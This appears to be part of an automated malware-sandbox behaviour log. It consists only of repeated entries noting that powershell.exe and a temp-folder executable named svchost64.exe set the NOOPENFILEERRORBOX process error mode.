Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
